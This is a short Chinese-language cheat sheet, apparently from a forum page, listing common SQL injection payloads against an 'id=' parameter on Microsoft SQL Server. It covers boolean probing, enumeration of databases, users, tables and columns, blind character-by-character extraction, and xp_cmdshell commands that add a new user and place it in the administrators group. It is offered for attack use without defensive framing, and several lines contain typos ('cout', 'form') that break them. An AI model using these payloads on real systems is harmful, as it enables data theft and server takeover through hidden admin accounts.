常见SQL注入
id=1 and 1=1id=1 and 1=2
id=1 and db_name()>0
id=1 and user>0
id=1 and (select count(*) from xx)>0
id=1 and (select cout(xxx) form xx)>0
id=1 and (select top 1 len(xxx) from xx)>0->1,2,3......
id=1 and (select top 1 asc(mid(xxx,1,1)) form xx)>0 -> 1-128
id=1;exec master..xp_cmdshell "net user username passwd /add"--
id=1;exec master..xp_cmdshell "net localgroup username administrators /add"--
id=1 and (select top 1 username from sysobjects where xtype=nchar(85) and status>0)>0
id=1 and (select top 1 col_name(object_id('xxx'),1) form sysobjects)>0
页:
[1]